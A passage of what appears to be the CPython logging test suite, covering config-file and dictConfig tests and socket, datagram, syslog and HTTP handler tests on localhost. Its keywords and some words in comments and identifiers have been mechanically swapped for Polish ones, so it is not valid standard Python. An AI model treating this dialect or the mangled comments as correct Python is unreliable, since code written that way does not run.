qualname=compiler.parser [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [handler_hand2] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stderr,) [formatter_form1] format=%(levelname)s ++ %(message)s datefmt= [formatter_form2] format=%(message)s datefmt= """ # config7 adds a compiler logger. config7 = """ [loggers] keys=root,parser,compiler [handlers] keys=hand1 [formatters] keys=form1 [logger_root] level=WARNING handlers=hand1 [logger_compiler] level=DEBUG handlers= propagate=1 qualname=compiler [logger_parser] level=DEBUG handlers= propagate=1 qualname=compiler.parser [handler_hand1] class=StreamHandler level=NOTSET formatter=form1 args=(sys.stdout,) [formatter_form1] format=%(levelname)s ++ %(message)s datefmt= """ disable_test = """ [loggers] keys=root [handlers] keys=screen [formatters] keys= [logger_root] level=DEBUG handlers=screen [handler_screen] level=DEBUG class=StreamHandler args=(sys.stdout,) formatter= """ def apply_config(self, conf, **kwargs): file = io.StringIO(textwrap.dedent(conf)) logging.config.fileConfig(file, **kwargs) def test_config0_ok(self): # A simple config file which overrides the default settings. przy support.captured_stdout() jako output: self.apply_config(self.config0) logger = logging.getLogger() # Won't output anything logger.info(self.next_message()) # Outputs a message logger.error(self.next_message()) self.assert_log_lines([ ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config0_using_cp_ok(self): # A simple config file which overrides the default settings. przy support.captured_stdout() jako output: file = io.StringIO(textwrap.dedent(self.config0)) cp = configparser.ConfigParser() cp.read_file(file) logging.config.fileConfig(cp) logger = logging.getLogger() # Won't output anything logger.info(self.next_message()) # Outputs a message logger.error(self.next_message()) self.assert_log_lines([ ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config1_ok(self, config=config1): # A config file defining a sub-parser jako well. przy support.captured_stdout() jako output: self.apply_config(config) logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config2_failure(self): # A simple config file which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config2) def test_config3_failure(self): # A simple config file which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config3) def test_config4_ok(self): # A config file specifying a custom formatter class. przy support.captured_stdout() jako output: self.apply_config(self.config4) logger = logging.getLogger() spróbuj: podnieś RuntimeError() wyjąwszy RuntimeError: logging.exception("just testing") sys.stdout.seek(0) self.assertEqual(output.getvalue(), "ERROR:root:just testing\nGot a [RuntimeError]\n") # Original logger output jest empty self.assert_log_lines([]) def test_config5_ok(self): self.test_config1_ok(config=self.config5) def test_config6_ok(self): self.test_config1_ok(config=self.config6) def test_config7_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config1a) logger = logging.getLogger("compiler.parser") # See issue #11424. compiler-hyphenated sorts # between compiler oraz compiler.xyz oraz this # was preventing compiler.xyz z being included # w the child loggers of compiler because of an # overzealous loop termination condition. hyphenated = logging.getLogger('compiler-hyphenated') # All will output a message logger.info(self.next_message()) logger.error(self.next_message()) hyphenated.critical(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ('CRITICAL', '3'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) przy support.captured_stdout() jako output: self.apply_config(self.config7) logger = logging.getLogger("compiler.parser") self.assertNieprawda(logger.disabled) # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) logger = logging.getLogger("compiler.lexer") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) # Will nie appear hyphenated.critical(self.next_message()) self.assert_log_lines([ ('INFO', '4'), ('ERROR', '5'), ('INFO', '6'), ('ERROR', '7'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_logger_disabling(self): self.apply_config(self.disable_test) logger = logging.getLogger('some_pristine_logger') self.assertNieprawda(logger.disabled) self.apply_config(self.disable_test) self.assertPrawda(logger.disabled) self.apply_config(self.disable_test, disable_existing_loggers=Nieprawda) self.assertNieprawda(logger.disabled) @unittest.skipUnless(threading, 'Threading required dla this test.') klasa SocketHandlerTest(BaseTest): """Test dla SocketHandler objects.""" jeżeli threading: server_class = TestTCPServer address = ('localhost', 0) def setUp(self): """Set up a TCP server to receive log messages, oraz a SocketHandler pointing to that server's address oraz port.""" BaseTest.setUp(self) self.server = server = self.server_class(self.address, self.handle_socket, 0.01) server.start() server.ready.wait() hcls = logging.handlers.SocketHandler jeżeli isinstance(server.server_address, tuple): self.sock_hdlr = hcls('localhost', server.port) inaczej: self.sock_hdlr = hcls(server.server_address, Nic) self.log_output = '' self.root_logger.removeHandler(self.root_logger.handlers[0]) self.root_logger.addHandler(self.sock_hdlr) self.handled = threading.Semaphore(0) def tearDown(self): """Shutdown the TCP server.""" spróbuj: self.server.stop(2.0) self.root_logger.removeHandler(self.sock_hdlr) self.sock_hdlr.close() w_końcu: BaseTest.tearDown(self) def handle_socket(self, request): conn = request.connection dopóki Prawda: chunk = conn.recv(4) jeżeli len(chunk) < 4: przerwij slen = struct.unpack(">L", chunk)[0] chunk = conn.recv(slen) dopóki len(chunk) < slen: chunk = chunk + conn.recv(slen - len(chunk)) obj = pickle.loads(chunk) record = logging.makeLogRecord(obj) self.log_output += record.msg + '\n' self.handled.release() def test_output(self): # The log message sent to the SocketHandler jest properly received. logger = logging.getLogger("tcp") logger.error("spam") self.handled.acquire() logger.debug("eggs") self.handled.acquire() self.assertEqual(self.log_output, "spam\neggs\n") def test_noserver(self): # Avoid timing-related failures due to SocketHandler's own hard-wired # one-second timeout on socket.create_connection() (issue #16264). self.sock_hdlr.retryStart = 2.5 # Kill the server self.server.stop(2.0) # The logging call should try to connect, which should fail spróbuj: podnieś RuntimeError('Deliberate mistake') wyjąwszy RuntimeError: self.root_logger.exception('Never sent') self.root_logger.error('Never sent, either') now = time.time() self.assertGreater(self.sock_hdlr.retryTime, now) time.sleep(self.sock_hdlr.retryTime - now + 0.001) self.root_logger.error('Nor this') def _get_temp_domain_socket(): fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock') os.close(fd) # just need a name - file can't be present, albo we'll get an # 'address already w use' error. os.remove(fn) zwróć fn @unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required") @unittest.skipUnless(threading, 'Threading required dla this test.') klasa UnixSocketHandlerTest(SocketHandlerTest): """Test dla SocketHandler przy unix sockets.""" jeżeli threading oraz hasattr(socket, "AF_UNIX"): server_class = TestUnixStreamServer def setUp(self): # override the definition w the base class self.address = _get_temp_domain_socket() SocketHandlerTest.setUp(self) def tearDown(self): SocketHandlerTest.tearDown(self) os.remove(self.address) @unittest.skipUnless(threading, 'Threading required dla this test.') klasa DatagramHandlerTest(BaseTest): """Test dla DatagramHandler.""" jeżeli threading: server_class = TestUDPServer address = ('localhost', 0) def setUp(self): """Set up a UDP server to receive log messages, oraz a DatagramHandler pointing to that server's address oraz port.""" BaseTest.setUp(self) self.server = server = self.server_class(self.address, self.handle_datagram, 0.01) server.start() server.ready.wait() hcls = logging.handlers.DatagramHandler jeżeli isinstance(server.server_address, tuple): self.sock_hdlr = hcls('localhost', server.port) inaczej: self.sock_hdlr = hcls(server.server_address, Nic) self.log_output = '' self.root_logger.removeHandler(self.root_logger.handlers[0]) self.root_logger.addHandler(self.sock_hdlr) self.handled = threading.Event() def tearDown(self): """Shutdown the UDP server.""" spróbuj: self.server.stop(2.0) self.root_logger.removeHandler(self.sock_hdlr) self.sock_hdlr.close() w_końcu: BaseTest.tearDown(self) def handle_datagram(self, request): slen = struct.pack('>L', 0) # length of prefix packet = request.packet[len(slen):] obj = pickle.loads(packet) record = logging.makeLogRecord(obj) self.log_output += record.msg + '\n' self.handled.set() def test_output(self): # The log message sent to the DatagramHandler jest properly received. logger = logging.getLogger("udp") logger.error("spam") self.handled.wait() self.handled.clear() logger.error("eggs") self.handled.wait() self.assertEqual(self.log_output, "spam\neggs\n") @unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required") @unittest.skipUnless(threading, 'Threading required dla this test.') klasa UnixDatagramHandlerTest(DatagramHandlerTest): """Test dla DatagramHandler using Unix sockets.""" jeżeli threading oraz hasattr(socket, "AF_UNIX"): server_class = TestUnixDatagramServer def setUp(self): # override the definition w the base class self.address = _get_temp_domain_socket() DatagramHandlerTest.setUp(self) def tearDown(self): DatagramHandlerTest.tearDown(self) os.remove(self.address) @unittest.skipUnless(threading, 'Threading required dla this test.') klasa SysLogHandlerTest(BaseTest): """Test dla SysLogHandler using UDP.""" jeżeli threading: server_class = TestUDPServer address = ('localhost', 0) def setUp(self): """Set up a UDP server to receive log messages, oraz a SysLogHandler pointing to that server's address oraz port.""" BaseTest.setUp(self) self.server = server = self.server_class(self.address, self.handle_datagram, 0.01) server.start() server.ready.wait() hcls = logging.handlers.SysLogHandler jeżeli isinstance(server.server_address, tuple): self.sl_hdlr = hcls(('localhost', server.port)) inaczej: self.sl_hdlr = hcls(server.server_address) self.log_output = '' self.root_logger.removeHandler(self.root_logger.handlers[0]) self.root_logger.addHandler(self.sl_hdlr) self.handled = threading.Event() def tearDown(self): """Shutdown the UDP server.""" spróbuj: self.server.stop(2.0) self.root_logger.removeHandler(self.sl_hdlr) self.sl_hdlr.close() w_końcu: BaseTest.tearDown(self) def handle_datagram(self, request): self.log_output = request.packet self.handled.set() def test_output(self): # The log message sent to the SysLogHandler jest properly received. logger = logging.getLogger("slh") logger.error("sp\xe4m") self.handled.wait() self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00') self.handled.clear() self.sl_hdlr.append_nul = Nieprawda logger.error("sp\xe4m") self.handled.wait() self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m') self.handled.clear() self.sl_hdlr.ident = "h\xe4m-" logger.error("sp\xe4m") self.handled.wait() self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m') @unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required") @unittest.skipUnless(threading, 'Threading required dla this test.') klasa UnixSysLogHandlerTest(SysLogHandlerTest): """Test dla SysLogHandler przy Unix sockets.""" jeżeli threading oraz hasattr(socket, "AF_UNIX"): server_class = TestUnixDatagramServer def setUp(self): # override the definition w the base class self.address = _get_temp_domain_socket() SysLogHandlerTest.setUp(self) def tearDown(self): SysLogHandlerTest.tearDown(self) os.remove(self.address) @unittest.skipUnless(threading, 'Threading required dla this test.') klasa HTTPHandlerTest(BaseTest): """Test dla HTTPHandler.""" def setUp(self): """Set up an HTTP server to receive log messages, oraz a HTTPHandler pointing to that server's address oraz port.""" BaseTest.setUp(self) self.handled = threading.Event() def handle_request(self, request): self.command = request.command self.log_data = urlparse(request.path) jeżeli self.command == 'POST': spróbuj: rlen = int(request.headers['Content-Length']) self.post_data = request.rfile.read(rlen) wyjąwszy: self.post_data = Nic request.send_response(200) request.end_headers() self.handled.set() def test_output(self): # The log message sent to the HTTPHandler jest properly received. logger = logging.getLogger("http") root_logger = self.root_logger root_logger.removeHandler(self.root_logger.handlers[0]) dla secure w (Nieprawda, Prawda): addr = ('localhost', 0) jeżeli secure: spróbuj: zaimportuj ssl wyjąwszy ImportError: sslctx = Nic inaczej: here = os.path.dirname(__file__) localhost_cert = os.path.join(here, "keycert.pem") sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) sslctx.load_cert_chain(localhost_cert) context = ssl.create_default_context(cafile=localhost_cert) inaczej: sslctx = Nic context = Nic self.server = server = TestHTTPServer(addr, self.handle_request, 0.01, sslctx=sslctx) server.start() server.ready.wait() host = 'localhost:%d' % server.server_port secure_client = secure oraz sslctx self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob', secure=secure_client, context=context) self.log_data = Nic root_logger.addHandler(self.h_hdlr) dla method w ('GET', 'POST'): self.h_hdlr.method = method self.handled.clear() msg = "sp\xe4m" logger.error(msg) self.handled.wait() self.assertEqual(self.log_data.path, '/frob') self.assertEqual(self.command, method) jeżeli method == 'GET': d = parse_qs(self.log_data.query) inaczej: d = parse_qs(self.post_data.decode('utf-8')) self.assertEqual(d['name'], ['http']) self.assertEqual(d['funcName'], ['test_output']) self.assertEqual(d['msg'], [msg]) self.server.stop(2.0) self.root_logger.removeHandler(self.h_hdlr) self.h_hdlr.close() klasa MemoryTest(BaseTest): """Test memory persistence of logger objects.""" def setUp(self): """Create a dict to remember potentially destroyed objects.""" BaseTest.setUp(self) self._survivors = {} def _watch_for_survival(self, *args): """Watch the given objects dla survival, by creating weakrefs to them.""" dla obj w args: key = id(obj), repr(obj) self._survivors[key] = weakref.ref(obj) def _assertPrawdasurvival(self): """Assert that all objects watched dla survival have survived.""" # Trigger cycle przerwijing. gc.collect() dead = [] dla (id_, repr_), ref w self._survivors.items(): jeżeli ref() jest Nic: dead.append(repr_) jeżeli dead: self.fail("%d objects should have survived " "but have been destroyed: %s" % (len(dead), ", ".join(dead))) def test_persistent_loggers(self): # Logger objects are persistent oraz retain their configuration, even # jeżeli visible references are destroyed. self.root_logger.setLevel(logging.INFO) foo = logging.getLogger("foo") self._watch_for_survival(foo) foo.setLevel(logging.DEBUG) self.root_logger.debug(self.next_message()) foo.debug(self.next_message()) self.assert_log_lines([ ('foo', 'DEBUG', '2'), ]) usuń foo # foo has survived. self._assertPrawdasurvival() # foo has retained its settings. bar = logging.getLogger("foo") bar.debug(self.next_message()) self.assert_log_lines([ ('foo', 'DEBUG', '2'), ('foo', 'DEBUG', '3'), ]) klasa EncodingTest(BaseTest): def test_encoding_plain_file(self): # In Python 2.x, a plain file object jest treated jako having no encoding. log = logging.getLogger("test") fd, fn = tempfile.mkstemp(".log", "test_logging-1-") os.close(fd) # the non-ascii data we write to the log. data = "foo\x80" spróbuj: handler = logging.FileHandler(fn, encoding="utf-8") log.addHandler(handler) spróbuj: # write non-ascii data to the log. log.warning(data) w_końcu: log.removeHandler(handler) handler.close() # check we wrote exactly those bytes, ignoring trailing \n etc f = open(fn, encoding="utf-8") spróbuj: self.assertEqual(f.read().rstrip(), data) w_końcu: f.close() w_końcu: jeżeli os.path.isfile(fn): os.remove(fn) def test_encoding_cyrillic_unicode(self): log = logging.getLogger("test") #Get a message w Unicode: Do svidanya w Cyrillic (meaning goodbye) message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f' #Ensure it's written w a Cyrillic encoding writer_class = codecs.getwriter('cp1251') writer_class.encoding = 'cp1251' stream = io.BytesIO() writer = writer_class(stream, 'strict') handler = logging.StreamHandler(writer) log.addHandler(handler) spróbuj: log.warning(message) w_końcu: log.removeHandler(handler) handler.close() # check we wrote exactly those bytes, ignoring trailing \n etc s = stream.getvalue() #Compare against what the data should be when encoded w CP-1251 self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n') klasa WarningsTest(BaseTest): def test_warnings(self): przy warnings.catch_warnings(): logging.captureWarnings(Prawda) self.addCleanup(logging.captureWarnings, Nieprawda) warnings.filterwarnings("always", category=UserWarning) stream = io.StringIO() h = logging.StreamHandler(stream) logger = logging.getLogger("py.warnings") logger.addHandler(h) warnings.warn("I'm warning you...") logger.removeHandler(h) s = stream.getvalue() h.close() self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0) #See jeżeli an explicit file uses the original implementation a_file = io.StringIO() warnings.showwarning("Explicit", UserWarning, "dummy.py", 42, a_file, "Dummy line") s = a_file.getvalue() a_file.close() self.assertEqual(s, "dummy.py:42: UserWarning: Explicit\n Dummy line\n") def test_warnings_no_handlers(self): przy warnings.catch_warnings(): logging.captureWarnings(Prawda) self.addCleanup(logging.captureWarnings, Nieprawda) # confirm our assumption: no loggers are set logger = logging.getLogger("py.warnings") self.assertEqual(logger.handlers, []) warnings.showwarning("Explicit", UserWarning, "dummy.py", 42) self.assertEqual(len(logger.handlers), 1) self.assertIsInstance(logger.handlers[0], logging.NullHandler) def formatFunc(format, datefmt=Nic): zwróć logging.Formatter(format, datefmt) def handlerFunc(): zwróć logging.StreamHandler() klasa CustomHandler(logging.StreamHandler): dalej klasa ConfigDictTest(BaseTest): """Reading logging config z a dictionary.""" expected_log_pat = r"^(\w+) \+\+ (\w+)$" # config0 jest a standard configuration. config0 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'root' : { 'level' : 'WARNING', 'handlers' : ['hand1'], }, } # config1 adds a little to the standard configuration. config1 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } # config1a moves the handler to the root. Used przy config8a config1a = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', }, }, 'root' : { 'level' : 'WARNING', 'handlers' : ['hand1'], }, } # config2 has a subtle configuration error that should be reported config2 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdbout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } #As config1 but przy a misspelt level on a handler config2a = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NTOSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } #As config1 but przy a misspelt level on a logger config2b = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WRANING', }, } # config3 has a less subtle configuration error config3 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'misspelled_name', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } # config4 specifies a custom formatter klasa to be loaded config4 = { 'version': 1, 'formatters': { 'form1' : { '()' : __name__ + '.ExceptionFormatter', 'format' : '%(levelname)s:%(name)s:%(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'root' : { 'level' : 'NOTSET', 'handlers' : ['hand1'], }, } # As config4 but using an actual callable rather than a string config4a = { 'version': 1, 'formatters': { 'form1' : { '()' : ExceptionFormatter, 'format' : '%(levelname)s:%(name)s:%(message)s', }, 'form2' : { '()' : __name__ + '.formatFunc', 'format' : '%(levelname)s:%(name)s:%(message)s', }, 'form3' : { '()' : formatFunc, 'format' : '%(levelname)s:%(name)s:%(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, 'hand2' : { '()' : handlerFunc, }, }, 'root' : { 'level' : 'NOTSET', 'handlers' : ['hand1'], }, } # config5 specifies a custom handler klasa to be loaded config5 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : __name__ + '.CustomHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } # config6 specifies a custom handler klasa to be loaded # but has bad arguments config6 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : __name__ + '.CustomHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', '9' : 'invalid parameter name', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } #config 7 does nie define compiler.parser but defines compiler.lexer #so compiler.parser should be disabled after applying it config7 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.lexer' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } # config8 defines both compiler oraz compiler.lexer # so compiler.parser should nie be disabled (since # compiler jest defined) config8 = { 'version': 1, 'disable_existing_loggers' : Nieprawda, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, 'compiler.lexer' : { }, }, 'root' : { 'level' : 'WARNING', }, } # config8a disables existing loggers config8a = { 'version': 1, 'disable_existing_loggers' : Prawda, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, 'compiler.lexer' : { }, }, 'root' : { 'level' : 'WARNING', }, } config9 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'WARNING', 'stream' : 'ext://sys.stdout', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'WARNING', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'NOTSET', }, } config9a = { 'version': 1, 'incremental' : Prawda, 'handlers' : { 'hand1' : { 'level' : 'WARNING', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'INFO', }, }, } config9b = { 'version': 1, 'incremental' : Prawda, 'handlers' : { 'hand1' : { 'level' : 'INFO', }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'INFO', }, }, } #As config1 but przy a filter added config10 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'filters' : { 'filt1' : { 'name' : 'compiler.parser', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', 'filters' : ['filt1'], }, }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'filters' : ['filt1'], }, }, 'root' : { 'level' : 'WARNING', 'handlers' : ['hand1'], }, } #As config1 but using cfg:// references config11 = { 'version': 1, 'true_formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handler_configs': { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'formatters' : 'cfg://true_formatters', 'handlers' : { 'hand1' : 'cfg://handler_configs[hand1]', }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } #As config11 but missing the version key config12 = { 'true_formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handler_configs': { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'formatters' : 'cfg://true_formatters', 'handlers' : { 'hand1' : 'cfg://handler_configs[hand1]', }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } #As config11 but using an unsupported version config13 = { 'version': 2, 'true_formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handler_configs': { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', }, }, 'formatters' : 'cfg://true_formatters', 'handlers' : { 'hand1' : 'cfg://handler_configs[hand1]', }, 'loggers' : { 'compiler.parser' : { 'level' : 'DEBUG', 'handlers' : ['hand1'], }, }, 'root' : { 'level' : 'WARNING', }, } # As config0, but przy properties config14 = { 'version': 1, 'formatters': { 'form1' : { 'format' : '%(levelname)s ++ %(message)s', }, }, 'handlers' : { 'hand1' : { 'class' : 'logging.StreamHandler', 'formatter' : 'form1', 'level' : 'NOTSET', 'stream' : 'ext://sys.stdout', '.': { 'foo': 'bar', 'terminator': '!\n', } }, }, 'root' : { 'level' : 'WARNING', 'handlers' : ['hand1'], }, } out_of_order = { "version": 1, "formatters": { "mySimpleFormatter": { "format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s", "style": "$" } }, "handlers": { "fileGlobal": { "class": "logging.StreamHandler", "level": "DEBUG", "formatter": "mySimpleFormatter" }, "bufferGlobal": { "class": "logging.handlers.MemoryHandler", "capacity": 5, "formatter": "mySimpleFormatter", "target": "fileGlobal", "level": "DEBUG" } }, "loggers": { "mymodule": { "level": "DEBUG", "handlers": ["bufferGlobal"], "propagate": "true" } } } def apply_config(self, conf): logging.config.dictConfig(conf) def test_config0_ok(self): # A simple config which overrides the default settings. przy support.captured_stdout() jako output: self.apply_config(self.config0) logger = logging.getLogger() # Won't output anything logger.info(self.next_message()) # Outputs a message logger.error(self.next_message()) self.assert_log_lines([ ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config1_ok(self, config=config1): # A config defining a sub-parser jako well. przy support.captured_stdout() jako output: self.apply_config(config) logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config2_failure(self): # A simple config which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config2) def test_config2a_failure(self): # A simple config which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config2a) def test_config2b_failure(self): # A simple config which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config2b) def test_config3_failure(self): # A simple config which overrides the default settings. self.assertRaises(Exception, self.apply_config, self.config3) def test_config4_ok(self): # A config specifying a custom formatter class. przy support.captured_stdout() jako output: self.apply_config(self.config4) #logger = logging.getLogger() spróbuj: podnieś RuntimeError() wyjąwszy RuntimeError: logging.exception("just testing") sys.stdout.seek(0) self.assertEqual(output.getvalue(), "ERROR:root:just testing\nGot a [RuntimeError]\n") # Original logger output jest empty self.assert_log_lines([]) def test_config4a_ok(self): # A config specifying a custom formatter class. przy support.captured_stdout() jako output: self.apply_config(self.config4a) #logger = logging.getLogger() spróbuj: podnieś RuntimeError() wyjąwszy RuntimeError: logging.exception("just testing") sys.stdout.seek(0) self.assertEqual(output.getvalue(), "ERROR:root:just testing\nGot a [RuntimeError]\n") # Original logger output jest empty self.assert_log_lines([]) def test_config5_ok(self): self.test_config1_ok(config=self.config5) def test_config6_failure(self): self.assertRaises(Exception, self.apply_config, self.config6) def test_config7_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config1) logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) przy support.captured_stdout() jako output: self.apply_config(self.config7) logger = logging.getLogger("compiler.parser") self.assertPrawda(logger.disabled) logger = logging.getLogger("compiler.lexer") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '3'), ('ERROR', '4'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) #Same jako test_config_7_ok but don't disable old loggers. def test_config_8_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config1) logger = logging.getLogger("compiler.parser") # All will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) przy support.captured_stdout() jako output: self.apply_config(self.config8) logger = logging.getLogger("compiler.parser") self.assertNieprawda(logger.disabled) # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) logger = logging.getLogger("compiler.lexer") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) 